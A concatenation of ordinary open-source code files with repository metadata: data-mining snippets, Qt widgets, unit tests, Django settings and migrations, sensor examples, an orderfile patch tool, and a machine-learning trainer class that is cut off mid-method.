association_rules = apriori(dailyRankedCrimes.values, min_support=0.02, min_confidence=0.95, min_lift=3, min_length=4, use_colnames = True)
association_results = list(association_rules)
print(len(association_results))
# 17
# ------------------ YEARLY DATASET --------------------
association_rules = apriori(yearlyRankedCrimes.values, min_support=0.02, min_confidence=0.95, min_lift=3, min_length=4, use_colnames = True)
association_results = list(association_rules)
print(len(association_results))
# 2
# Not many rules were found, so experiment with the settings:
association_rules = apriori(yearlyRankedCrimes.values, min_support=0.0045, min_confidence=0.95, min_lift=1, min_length=2, use_colnames = True)
association_results = list(association_rules)
print(len(association_results))
# 41
# This is better
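# The "common commands" referred to in the next comment are not included in this file;
# a minimal sketch of printing the rules (assuming the apyori package, whose result
# records expose .items, .support and .ordered_statistics) could look like:
#   for item in association_results:
#       rule = item.ordered_statistics[0]
#       print(list(rule.items_base), "->", list(rule.items_add))
#       print("Support:", item.support, "Confidence:", rule.confidence, "Lift:", rule.lift)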
# I printed the Rules using the common commands (found in common-commands.py)
| 37.866667 | 142 | 0.634683 | ["MIT"] | CraftingGamerTom/wsu-computer-science | CS-383_Cloud-Computing_2020-Spring/association-rule-mining/attempt2.py | 1,136 | Python |
# Copyright (c) 2013 Shotgun Software Inc.
#
# CONFIDENTIAL AND PROPRIETARY
#
# This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit
# Source Code License included in this distribution package. See LICENSE.
# By accessing, using, copying or modifying this work you indicate your
# agreement to the Shotgun Pipeline Toolkit Source Code License. All rights
# not expressly granted therein are reserved by Shotgun Software Inc.
import sgtk
from tank.platform.qt import QtGui
from tank.platform.qt import QtCore
from . import project_model
views = sgtk.platform.import_framework("tk-framework-qtwidgets", "views")
class ProjectWidget(QtGui.QFrame):
""" Simple widget that shows a project's thumbnail and name. """
MARGIN = 5
ICON_SIZE = QtCore.QSize(32, 32)
def __init__(self, parent=None):
QtGui.QFrame.__init__(self, parent)
# initialize the UI
# simple frame with a thumbnail and a label
self.setObjectName("frame")
self.setFrameStyle(self.NoFrame)
self.setContentsMargins(self.MARGIN, self.MARGIN, self.MARGIN, self.MARGIN)
self.label = QtGui.QLabel(self)
self.label.setAlignment(QtCore.Qt.AlignVCenter | QtCore.Qt.AlignLeft)
self.label.setWordWrap(True)
self.thumbnail = QtGui.QLabel(self)
self.thumbnail.setScaledContents(True)
self.layout = QtGui.QHBoxLayout(self)
self.layout.addWidget(self.thumbnail)
self.layout.addWidget(self.label)
self.layout.setStretchFactor(self.label, 1)
self.layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(self.layout)
self.setVisible(False)
self.set_selected(False)
def set_thumbnail(self, pixmap):
scaled = pixmap.scaled(self.ICON_SIZE, QtCore.Qt.KeepAspectRatio)
self.thumbnail.setPixmap(scaled)
def set_text(self, label):
metrics = QtGui.QFontMetrics(self.label.font())
elided = metrics.elidedText(label, QtCore.Qt.ElideMiddle, self.label.width())
self.label.setText(elided)
self.setToolTip(label)
def set_selected(self, selected):
""" Update the styling to reflect if the widget is selected or not """
if selected:
p = QtGui.QPalette()
highlight_col = p.color(QtGui.QPalette.Active, QtGui.QPalette.Highlight)
transp_highlight_str = "rgba(%s, %s, %s, 25%%)" % \
(highlight_col.red(), highlight_col.green(), highlight_col.blue())
highlight_str = "rgb(%s, %s, %s)" % \
(highlight_col.red(), highlight_col.green(), highlight_col.blue())
# make a border around the cell
self.setStyleSheet(
"""#frame {
border-width: 2px;
border-color: %s;
border-style: solid;
background-color: %s;
}
""" % (highlight_str, transp_highlight_str))
else:
self.setStyleSheet(
"""#frame {
border-width: 2px;
border-color: transparent;
border-style: solid;
}""")
class ProjectDelegate(views.EditSelectedWidgetDelegate):
""" Wrapper around the ProjectWidget for delegate use """
def __init__(self, view):
views.EditSelectedWidgetDelegate.__init__(self, view)
def _create_widget(self, parent):
return ProjectWidget(parent)
def _on_before_paint(self, widget, model_index, style_options):
if (style_options.state & QtGui.QStyle.State_Selected):
widget.set_selected(True)
else:
widget.set_selected(False)
icon = model_index.data(QtCore.Qt.DecorationRole)
if icon is not None:
thumb = icon.pixmap(30)
widget.set_thumbnail(thumb)
widget.set_text(model_index.data(project_model.ProjectModel.DISPLAY_NAME_ROLE))
def _on_before_selection(self, widget, model_index, style_options):
self._on_before_paint(widget, model_index, style_options)
def sizeHint(self, style_options, model_index):
return QtCore.QSize(175, 2*ProjectWidget.MARGIN + ProjectWidget.ICON_SIZE.height())
| 36.724138 | 91 | 0.64507 | [
"MIT"
] | JoanAzpeitia/lp_sg | install/app_store/tk-framework-adminui/v0.1.6/python/setup_project/project_delegate.py | 4,260 | Python |
import unittest
from robotide.preferences.settings import SettingsMigrator
from robotide.utils import overrides
class SettingsMigrationTestCase(SettingsMigrator, unittest.TestCase):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
def setUp(self):
self._old_settings = {}
self._default_settings = lambda:0
self._from_0_to_1_called = False
self._from_1_to_2_called = False
self._merge_called = False
def test_migration_from_0_to_2(self):
self._old_settings[SettingsMigrator.SETTINGS_VERSION] = 0
self.migrate()
self.assertTrue(self._from_0_to_1_called)
self.assertTrue(self._from_1_to_2_called)
self.assertTrue(self._merge_called)
def test_migration_from_1_to_2(self):
self._old_settings[SettingsMigrator.SETTINGS_VERSION] = 1
self.migrate()
self.assertFalse(self._from_0_to_1_called)
self.assertTrue(self._from_1_to_2_called)
self.assertTrue(self._merge_called)
@overrides(SettingsMigrator)
def migrate_from_0_to_1(self, settings):
self.assertEqual(self._old_settings, settings)
self._from_0_to_1_called = True
settings[SettingsMigrator.SETTINGS_VERSION] = 1
@overrides(SettingsMigrator)
def migrate_from_1_to_2(self, settings):
self.assertEqual(self._old_settings, settings)
self._from_1_to_2_called = True
settings[SettingsMigrator.SETTINGS_VERSION] = 2
def merge(self):
self._merge_called = True
if __name__ == '__main__':
unittest.main()
| 33.163265 | 69 | 0.721231 | ["ECL-2.0", "Apache-2.0"] | Acidburn0zzz/RIDE | utest/preferences/test_settings.py | 1,625 | Python |
###
# Copyright (c) 2003-2005, Daniel DiPaolo
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import time
from supybot.test import *
class NewsTestCase(ChannelPluginTestCase):
plugins = ('News','User')
def setUp(self):
ChannelPluginTestCase.setUp(self)
# Create a valid user to use
self.prefix = 'news!bar@baz'
self.irc.feedMsg(ircmsgs.privmsg(self.nick, 'register tester moo',
prefix=self.prefix))
m = self.irc.takeMsg() # Response to register.
def testAddnews(self):
self.assertNotError('add 0 subject: foo')
self.assertRegexp('news', 'subject')
self.assertNotError('add 0 subject2: foo2')
self.assertRegexp('news', 'subject.*subject2')
self.assertNotError('add 5 subject3: foo3')
self.assertRegexp('news', 'subject3')
print()
print('Sleeping to expire the news item (testAddnews)')
time.sleep(6)
print('Done sleeping.')
self.assertNotRegexp('news', 'subject3')
def testNews(self):
# These should both fail first, as they will have nothing in the DB
self.assertRegexp('news', 'no news')
self.assertRegexp('news #channel', 'no news')
# Now we'll add news and make sure listnews doesn't fail
self.assertNotError('add #channel 0 subject: foo')
self.assertNotError('news #channel')
self.assertNotError('add 0 subject: foo')
self.assertRegexp('news', '#1')
self.assertNotError('news 1')
def testChangenews(self):
self.assertNotError('add 0 Foo: bar')
self.assertNotError('change 1 s/bar/baz/')
self.assertNotRegexp('news 1', 'bar')
self.assertRegexp('news 1', 'baz')
def testOldnews(self):
self.assertRegexp('old', 'No old news')
self.assertNotError('add 0 a: b')
self.assertRegexp('old', 'No old news')
self.assertNotError('add 5 foo: bar')
self.assertRegexp('old', 'No old news')
print()
print('Sleeping to expire the news item (testOldnews)')
time.sleep(6)
print('Done sleeping.')
self.assertNotError('old')
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
| 42.579545 | 79 | 0.681345 | ["BSD-3-Clause"] | ircpuzzles/competitionbot | plugins/News/test.py | 3,747 | Python |
from enum import Enum
class GeneClass(str, Enum):
PROTEIN_CODING = ("protein coding,nonsense mediated decay",)
PSEUDOGENE = "pseudogene,unprocessed pseudogene,polymorphic pseudogene,unitary pseudogene,transcribed unprocessed pseudogene,transcribed processed pseudogene, IG pseudogene"
MICRO_RNA = "micro RNA"
SHORT_NCRNA = (
"piRNA,rRNA,siRNA,snRNA,snoRNA,tRNA,scaRNA,vaultRNA,sRNA,misc RNA"
)
LONG_NCRNA = "lincRNA,macro IncRNA,prime3 overlapping ncrna,antisense,retained intron,sense intronic,sense overlapping,macro IncRNA,bidirectional IncRNA"
IMMUNOGLOBULIN = "IG C gene,IG D gene,IG J gene,IG V gene"
T_CELL_RECEPTOR = "TR C gene,TR J gene, TR V gene"
| 50 | 177 | 0.76 | ["MIT"] | lifeomic/phc-sdk-py | phc/easy/omics/options/gene_class.py | 700 | Python |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""post process for 310 inference"""
import os
import json
import argparse
import numpy as np
parser = argparse.ArgumentParser(description="resnet inference")
parser.add_argument("--result_path", type=str, required=True, help="result files path.")
parser.add_argument("--label_path", type=str, required=True, help="image file path.")
args = parser.parse_args()
batch_size = 1
num_classes = 1000
def get_result(result_path, label_path):
"""calculate the result"""
files = os.listdir(result_path)
with open(label_path, "r") as label:
labels = json.load(label)
top1 = 0
top5 = 0
total_data = len(files)
for file in files:
img_ids_name = file.split('_0.')[0]
data_path = os.path.join(result_path, img_ids_name + "_0.bin")
result = np.fromfile(data_path, dtype=np.float16).reshape(batch_size, num_classes)
for batch in range(batch_size):
predict = np.argsort(-result[batch], axis=-1)
if labels[img_ids_name+".JPEG"] == predict[0]:
top1 += 1
if labels[img_ids_name+".JPEG"] in predict[:5]:
top5 += 1
print(f"Total data: {total_data}, top1 accuracy: {top1/total_data}, top5 accuracy: {top5/total_data}.")
if __name__ == '__main__':
get_result(args.result_path, args.label_path)
| 37.509434 | 107 | 0.666499 | [
"Apache-2.0"
] | mindspore-ai/models | research/cv/resnext152_64x4d/postprocess.py | 1,988 | Python |
from .checkpoints_evaluation import CheckpointsEvaluationControlFlow
from .controlflow import (
record_train_batch_stats,
record_validation_stats,
validation_round,
)
from .helpers import prepare_batch
__all__ = [
"CheckpointsEvaluationControlFlow",
"record_validation_stats",
"record_train_batch_stats",
"validation_round",
"prepare_batch",
]
| 23.5625 | 68 | 0.777188 | [
"Apache-2.0"
] | c4dt/mlbench-core | mlbench_core/controlflow/pytorch/__init__.py | 377 | Python |
# SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries
# SPDX-License-Identifier: MIT
""" Display accelerometer data once per second """
import time
import board
import adafruit_lsm303_accel
i2c = board.I2C() # uses board.SCL and board.SDA
sensor = adafruit_lsm303_accel.LSM303_Accel(i2c)
while True:
acc_x, acc_y, acc_z = sensor.acceleration
print(
"Acceleration (m/s^2): ({0:10.3f}, {1:10.3f}, {2:10.3f})".format(
acc_x, acc_y, acc_z
)
)
print("")
time.sleep(1.0)
| 22.956522 | 73 | 0.666667 | ["MIT"] | Yarik9008/SoftAcademic | libralli/circcuitpython/adafruit-circuitpython-bundle-7.x-mpy-20211225/examples/lsm303_accel_simpletest.py | 528 | Python |
#!/usr/bin/python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Patch an orderfile.
Starting with a list of symbols in a binary and an orderfile (ordered list of
symbols), matches the symbols in the orderfile and augments each symbol with the
symbols residing at the same address (due to having identical code).
Note: It is possible to have.
- Several symbols mapping to the same offset in the binary.
- Several offsets for a given symbol (because we strip the ".clone." suffix)
TODO(lizeb): Since the suffix ".clone." is only used with -O3 that we don't
currently use, simplify the logic by removing the suffix handling.
The general pipeline is:
1. Get the symbol infos (name, offset, size, section) from the binary
2. Get the symbol names from the orderfile
3. Find the orderfile symbol names in the symbols coming from the binary
4. For each symbol found, get all the symbols at the same address
5. Output them to an updated orderfile, with several different prefixes
"""
import collections
import logging
import optparse
import sys
import cygprofile_utils
import symbol_extractor
# Prefixes for the symbols. We strip them from the incoming symbols, and add
# them back in the output file.
_PREFIXES = ('.text.startup.', '.text.hot.', '.text.unlikely.', '.text.')
def _RemoveClone(name):
"""Return name up to the ".clone." marker."""
clone_index = name.find('.clone.')
if clone_index != -1:
return name[:clone_index]
return name
def _GroupSymbolInfos(symbol_infos):
"""Group the symbol infos by name and offset.
Args:
symbol_infos: an iterable of SymbolInfo
Returns:
The same output as _GroupSymbolInfosFromBinary.
"""
# Map the addresses to symbols.
offset_to_symbol_infos = collections.defaultdict(list)
name_to_symbol_infos = collections.defaultdict(list)
for symbol in symbol_infos:
symbol = symbol_extractor.SymbolInfo(name=_RemoveClone(symbol.name),
offset=symbol.offset,
size=symbol.size,
section=symbol.section)
offset_to_symbol_infos[symbol.offset].append(symbol)
name_to_symbol_infos[symbol.name].append(symbol)
return (dict(offset_to_symbol_infos), dict(name_to_symbol_infos))
def _GroupSymbolInfosFromBinary(binary_filename):
"""Group all the symbols from a binary by name and offset.
Args:
binary_filename: path to the binary.
Returns:
A tuple of dict:
(offset_to_symbol_infos, name_to_symbol_infos):
- offset_to_symbol_infos: {offset: [symbol_info1, ...]}
- name_to_symbol_infos: {name: [symbol_info1, ...]}
"""
symbol_infos = symbol_extractor.SymbolInfosFromBinary(binary_filename)
return _GroupSymbolInfos(symbol_infos)
def _StripPrefix(line):
"""Get the symbol from a line with a linker section name.
Args:
line: a line from an orderfile, usually in the form:
.text.SymbolName
Returns:
The symbol, SymbolName in the example above.
"""
line = line.rstrip('\n')
for prefix in _PREFIXES:
if line.startswith(prefix):
return line[len(prefix):]
return line # Unprefixed case
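# For example (illustrative values, not from the original file):
#   _StripPrefix('.text.hot.FooBar') returns 'FooBar'
#   _RemoveClone('FooBar.clone.1') returns 'FooBar'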
def _GetSymbolsFromStream(lines):
"""Get the symbols from an iterable of lines.
Filters out wildcards and lines which do not correspond to symbols.
Args:
lines: iterable of lines from an orderfile.
Returns:
Same as GetSymbolsFromOrderfile
"""
# TODO(lizeb): Retain the prefixes later in the processing stages.
symbols = []
unique_symbols = set()
for line in lines:
line = _StripPrefix(line)
name = _RemoveClone(line)
if name == '' or name == '*' or name == '.text':
continue
if not line in unique_symbols:
symbols.append(line)
unique_symbols.add(line)
return symbols
def GetSymbolsFromOrderfile(filename):
"""Return the symbols from an orderfile.
Args:
filename: The name of the orderfile.
Returns:
A list of symbol names.
"""
with open(filename, 'r') as f:
return _GetSymbolsFromStream(f.xreadlines())
def _SymbolsWithSameOffset(profiled_symbol, name_to_symbol_info,
offset_to_symbol_info):
"""Expand a profiled symbol to include all symbols which share an offset
with that symbol.
Args:
profiled_symbol: the string symbol name to be expanded.
name_to_symbol_info: {name: [symbol_info1], ...}, as returned by
GetSymbolInfosFromBinary
offset_to_symbol_info: {offset: [symbol_info1, ...], ...}
Returns:
A list of symbol names, or an empty list if profiled_symbol was not in
name_to_symbol_info.
"""
if not profiled_symbol in name_to_symbol_info:
return []
symbol_infos = name_to_symbol_info[profiled_symbol]
expanded = []
for symbol_info in symbol_infos:
expanded += (s.name for s in offset_to_symbol_info[symbol_info.offset])
return expanded
def _ExpandSymbols(profiled_symbols, name_to_symbol_infos,
offset_to_symbol_infos):
"""Expand all of the symbols in profiled_symbols to include any symbols which
share the same address.
Args:
profiled_symbols: Symbols to match
name_to_symbol_infos: {name: [symbol_info1], ...}, as returned by
GetSymbolInfosFromBinary
offset_to_symbol_infos: {offset: [symbol_info1, ...], ...}
Returns:
A list of the symbol names.
"""
found_symbols = 0
missing_symbols = []
all_symbols = []
for name in profiled_symbols:
expansion = _SymbolsWithSameOffset(name,
name_to_symbol_infos, offset_to_symbol_infos)
if expansion:
found_symbols += 1
all_symbols += expansion
else:
all_symbols.append(name)
missing_symbols.append(name)
logging.info('symbols found: %d\n' % found_symbols)
  if missing_symbols:
logging.warning('%d missing symbols.' % len(missing_symbols))
missing_symbols_to_show = min(100, len(missing_symbols))
logging.warning('First %d missing symbols:\n%s' % (
missing_symbols_to_show,
'\n'.join(missing_symbols[:missing_symbols_to_show])))
return all_symbols
def _PrintSymbolsWithPrefixes(symbol_names, output_file):
"""For each symbol, outputs it to output_file with the prefixes."""
unique_outputs = set()
for name in symbol_names:
for prefix in _PREFIXES:
linker_section = prefix + name
if not linker_section in unique_outputs:
output_file.write(linker_section + '\n')
unique_outputs.add(linker_section)
def main(argv):
parser = optparse.OptionParser(usage=
'usage: %prog [options] <unpatched_orderfile> <library>')
parser.add_option('--target-arch', action='store', dest='arch',
choices=['arm', 'arm64', 'x86', 'x86_64', 'x64', 'mips'],
help='The target architecture for the library.')
options, argv = parser.parse_args(argv)
if not options.arch:
options.arch = cygprofile_utils.DetectArchitecture()
if len(argv) != 3:
parser.print_help()
return 1
orderfile_filename = argv[1]
binary_filename = argv[2]
symbol_extractor.SetArchitecture(options.arch)
(offset_to_symbol_infos, name_to_symbol_infos) = _GroupSymbolInfosFromBinary(
binary_filename)
profiled_symbols = GetSymbolsFromOrderfile(orderfile_filename)
expanded_symbols = _ExpandSymbols(
profiled_symbols, name_to_symbol_infos, offset_to_symbol_infos)
_PrintSymbolsWithPrefixes(expanded_symbols, sys.stdout)
# The following is needed otherwise Gold only applies a partial sort.
print '.text' # gets methods not in a section, such as assembly
print '.text.*' # gets everything else
return 0
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
sys.exit(main(sys.argv))
| 32.936975 | 80 | 0.710677 | ["BSD-3-Clause"] | yury-s/v8-inspector | Source/chrome/tools/cygprofile/patch_orderfile.py | 7,839 | Python |
# Generated by Django 2.0.2 on 2018-09-06 13:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('institution', '0016_institution_funding_document_email'),
]
operations = [
migrations.AddField(
model_name='institution',
name='funding_document_receiver',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='institution',
name='funding_document_template',
field=models.CharField(max_length=100, null=True),
),
]
| 26.125 | 67 | 0.623604 | ["MIT"] | M4rkD/cogs3 | institution/migrations/0017_auto_20180906_1349.py | 627 | Python |
# -*- coding: utf-8 -*-
"""
This file contains all the settings used in production.
This file is required and if development.py is present these
values are overridden.
"""
from server.settings.components import config
# Production flags:
# https://docs.djangoproject.com/en/2.2/howto/deployment/
DEBUG = False
ALLOWED_HOSTS = [
# TODO: check production hosts
config('DOMAIN_NAME'),
# We need this value for `healthcheck` to work:
'localhost',
]
# Staticfiles
# https://docs.djangoproject.com/en/2.2/ref/contrib/staticfiles/
# This is a hack to allow a special flag to be used with `--dry-run`
# to test things locally.
_COLLECTSTATIC_DRYRUN = config(
'DJANGO_COLLECTSTATIC_DRYRUN', cast=bool, default=False,
)
# Adding STATIC_ROOT to collect static files via 'collectstatic':
STATIC_ROOT = '.static' if _COLLECTSTATIC_DRYRUN else '/var/www/django/static'
STATICFILES_STORAGE = (
# This is a string, not a tuple,
# but it does not fit into 80 characters rule.
'django.contrib.staticfiles.storage.ManifestStaticFilesStorage'
)
# Media files
# https://docs.djangoproject.com/en/2.2/topics/files/
MEDIA_ROOT = '/var/www/django/media'
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
_PASS = 'django.contrib.auth.password_validation' # noqa: S105
AUTH_PASSWORD_VALIDATORS = [
{'NAME': '{0}.UserAttributeSimilarityValidator'.format(_PASS)},
{'NAME': '{0}.MinimumLengthValidator'.format(_PASS)},
{'NAME': '{0}.CommonPasswordValidator'.format(_PASS)},
{'NAME': '{0}.NumericPasswordValidator'.format(_PASS)},
]
# Security
# https://docs.djangoproject.com/en/2.2/topics/security/
SECURE_HSTS_SECONDS = 31536000 # the same as Caddy has
SECURE_HSTS_INCLUDE_SUBDOMAINS = True
SECURE_HSTS_PRELOAD = True
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
SECURE_SSL_REDIRECT = True
SECURE_REDIRECT_EXEMPT = [
# This is required for healthcheck to work:
'^health/',
]
SESSION_COOKIE_SECURE = True
CSRF_COOKIE_SECURE = True
| 26.294872 | 78 | 0.736714 | ["MIT"] | alisher-matkurbanov/wemake-django-template | {{cookiecutter.project_name}}/server/settings/environments/production.py | 2,051 | Python |
# ============================================
__author__ = "Sachin Mehta and Ximing Lu"
__maintainer__ = "Sachin Mehta and Ximing Lu"
# ============================================
import torch
from utilities.print_utilities import *
import os
from utilities.lr_scheduler import get_lr_scheduler
from metrics.metric_utils import accuracy
from metrics.statistics import Statistics
import gc
from utilities.utils import save_checkpoint, load_checkpoint, save_arguments
from utilities.build_dataloader import get_data_loader
from utilities.build_model import build_model
from utilities.build_optimizer import build_optimizer, update_optimizer, read_lr_from_optimzier
from utilities.build_criteria import build_criteria
import numpy as np
import math
import json
from utilities.save_dict_to_file import DictWriter
from train_and_eval.train_utils import prediction
class Trainer(object):
    '''This class implements the training and validation functionality for training an ML model for medical imaging.'''
def __init__(self, opts):
super(Trainer, self).__init__()
self.opts = opts
self.best_acc = 0
self.start_epoch = 0
# maximum batch size for CNN on single GPU
self.max_bsz_cnn_gpu0 = opts.max_bsz_cnn_gpu0
self.resume = self.opts.checkpoint if self.opts.checkpoint is not None and os.path.isdir(
self.opts.checkpoint) else None
self.global_setter()
def global_setter(self):
self.setup_device()
self.setup_directories()
self.setup_logger()
self.setup_lr_scheduler()
self.setup_dataloader()
self.setup_model_optimizer_lossfn()
def setup_directories(self):
if not os.path.isdir(self.opts.savedir):
os.makedirs(self.opts.savedir)
def setup_device(self):
num_gpus = torch.cuda.device_count()
self.num_gpus = num_gpus
if num_gpus > 0:
print_log_message('Using {} GPUs'.format(num_gpus))
else:
print_log_message('Using CPU')
self.device = torch.device("cuda:0" if num_gpus > 0 else "cpu")
self.use_multi_gpu = True if num_gpus > 1 else False
if torch.backends.cudnn.is_available():
import torch.backends.cudnn as cudnn
cudnn.benchmark = True
cudnn.deterministic = True
def setup_logger(self):
# Let's visualize logs on tensorboard. It's awesome
try:
from torch.utils.tensorboard import SummaryWriter
except:
from utilities.summary_writer import SummaryWriter
self.logger = SummaryWriter(log_dir=self.opts.savedir, comment='Training and Validation logs')
def setup_lr_scheduler(self):
# fetch learning rate scheduler
self.lr_scheduler = get_lr_scheduler(self.opts)
def setup_dataloader(self):
from model.base_feature_extractor import BaseFeatureExtractor
base_feature_extractor = BaseFeatureExtractor(opts=self.opts)
base_feature_extractor = base_feature_extractor.to(device=self.device)
# We do not want the base extractor to train, so setting it to eval mode
if self.use_multi_gpu:
base_feature_extractor = torch.nn.DataParallel(base_feature_extractor)
self.base_feature_extractor = base_feature_extractor
self.base_feature_extractor.eval()
# sanity check
if self.base_feature_extractor.training:
print_warning_message('Base feature extractor is in training mode. Moving to evaluation mode')
self.base_feature_extractor.eval()
train_loader, val_loader, diag_classes, class_weights = get_data_loader(opts=self.opts)
self.train_loader = train_loader
self.val_loader = val_loader
self.diag_classes = diag_classes
self.class_weights = torch.from_numpy(class_weights)
def setup_model_optimizer_lossfn(self):
# Build Model
odim = self.base_feature_extractor.module.output_feature_sz if self.use_multi_gpu else self.base_feature_extractor.output_feature_sz
mi_model = build_model(opts=self.opts,
diag_classes=self.diag_classes,
base_feature_odim=odim
)
if self.resume is not None:
resume_ep, resume_model_state, resume_optim_state, resume_perf = load_checkpoint(
checkpoint_dir=self.opts.checkpoint,
device=self.device)
self.start_epoch = resume_ep
self.best_acc = resume_perf
self.mi_model.load_state_dict(resume_model_state)
self.optimizer.load_state_dict(resume_optim_state)
# move optimizer state to the device
for state in self.optimizer.state.values():
for k, v in state.items():
if isinstance(v, torch.Tensor):
state[k] = v.to(device=self.device)
print_log_message('Resuming from checkpoint saved at {}th epoch'.format(self.start_epoch))
mi_model = mi_model.to(device=self.device)
if self.use_multi_gpu:
mi_model = torch.nn.DataParallel(mi_model)
self.mi_model = mi_model
# Build Loss function
criteria = build_criteria(opts=self.opts, class_weights=self.class_weights.float())
self.criteria = criteria.to(device=self.device)
# Build optimizer
self.optimizer = build_optimizer(model=self.mi_model, opts=self.opts)
def training(self, epoch, lr, *args, **kwargs):
train_stats = Statistics()
self.mi_model.train()
self.optimizer.zero_grad()
num_samples = len(self.train_loader)
epoch_start_time = time.time()
for batch_id, batch in enumerate(self.train_loader):
words, true_diag_labels = batch
true_diag_labels = true_diag_labels.to(device=self.device)
# prediction
pred_diag_labels = prediction(
words=words,
cnn_model=self.base_feature_extractor,
mi_model=self.mi_model,
max_bsz_cnn_gpu0=self.max_bsz_cnn_gpu0,
num_gpus=self.num_gpus,
device=self.device
)
# compute loss
loss = self.criteria(pred_diag_labels, true_diag_labels)
# compute metrics
top1_acc = accuracy(pred_diag_labels, true_diag_labels, topk=(1,))
loss.backward()
# Gradient accumulation is useful, when batch size is very small say 1
# Gradients will be accumulated for accum_count iterations
# After accum_count iterations, weights are updated and graph is freed.
if (batch_id + 1) % self.opts.accum_count == 0 or batch_id + 1 == len(self.train_loader):
self.optimizer.step()
self.optimizer.zero_grad()
train_stats.update(loss=loss.item(), acc=top1_acc[0].item())
if batch_id % self.opts.log_interval == 0 and batch_id > 0: # print after every 100 batches
train_stats.output(epoch=epoch, batch=batch_id, n_batches=num_samples, start=epoch_start_time, lr=lr)
return train_stats.avg_acc(), train_stats.avg_loss()
def warm_up(self, *args, **kwargs):
self.mi_model.train()
num_samples = len(self.train_loader)
warm_up_iterations = int(math.ceil((self.opts.warm_up_iterations * 1.0) / num_samples) * num_samples)
print_info_message('Warming Up')
print_log_message(
'LR will linearly change from {} to {} in about {} steps'.format(self.opts.warm_up_min_lr, self.opts.lr,
warm_up_iterations))
lr_list = np.linspace(1e-7, self.opts.lr, warm_up_iterations)
epoch_start_time = time.time()
iteration = -1
while iteration < warm_up_iterations:
warm_up_stats = Statistics()
for batch_id, batch in enumerate(self.train_loader):
if iteration >= warm_up_iterations:
break
iteration += 1
try:
lr_iter = lr_list[iteration]
except:
# fall back to final LR after warm-up step if iteration is outsize lr_list range
lr_iter = self.opts.lr
# update learning rate at every iteration
self.optimizer = update_optimizer(optimizer=self.optimizer, lr_value=lr_iter)
words, true_diag_labels = batch
true_diag_labels = true_diag_labels.to(device=self.device)
# prediction
pred_diag_labels = prediction(
words=words,
cnn_model=self.base_feature_extractor,
mi_model=self.mi_model,
max_bsz_cnn_gpu0=self.max_bsz_cnn_gpu0,
num_gpus=self.num_gpus,
device=self.device
)
# compute loss
loss = self.criteria(pred_diag_labels, true_diag_labels)
# compute metrics
top1_acc = accuracy(pred_diag_labels, true_diag_labels, topk=(1,))
loss.backward()
# Gradient accumulation is useful, when batch size is very small say 1
# Gradients will be accumulated for accum_count iterations
# After accum_count iterations, weights are updated and graph is freed.
if (batch_id + 1) % self.opts.accum_count == 0 or batch_id + 1 == len(self.train_loader):
self.optimizer.step()
self.optimizer.zero_grad()
warm_up_stats.update(loss=loss.item(), acc=top1_acc[0].item())
if batch_id % self.opts.log_interval == 0 and batch_id > 0: # print after every 100 batches
warm_up_stats.output(epoch=-1, batch=iteration, n_batches=warm_up_iterations,
start=epoch_start_time,
lr=lr_iter)
gc.collect()
print_log_message('Warming Up... Done!!!')
def validation(self, epoch, lr, *args, **kwargs):
val_stats = Statistics()
self.mi_model.eval()
num_samples = len(self.val_loader)
with torch.no_grad():
epoch_start_time = time.time()
for batch_id, batch in enumerate(self.val_loader):
# bags, bag_hist_arr, words, word_hist_arr, true_diag_labels = batch
words, true_diag_labels = batch
true_diag_labels = true_diag_labels.to(device=self.device)
# prediction
pred_diag_labels = prediction(
words=words,
cnn_model=self.base_feature_extractor,
mi_model=self.mi_model,
max_bsz_cnn_gpu0=self.max_bsz_cnn_gpu0,
num_gpus=self.num_gpus,
device=self.device
)
# compute loss
loss = self.criteria(pred_diag_labels, true_diag_labels)
# compute metrics
top1_acc = accuracy(pred_diag_labels, true_diag_labels, topk=(1,))
val_stats.update(loss=loss.item(), acc=top1_acc[0].item())
if batch_id % self.opts.log_interval == 0 and batch_id > 0: # print after every 100 batches
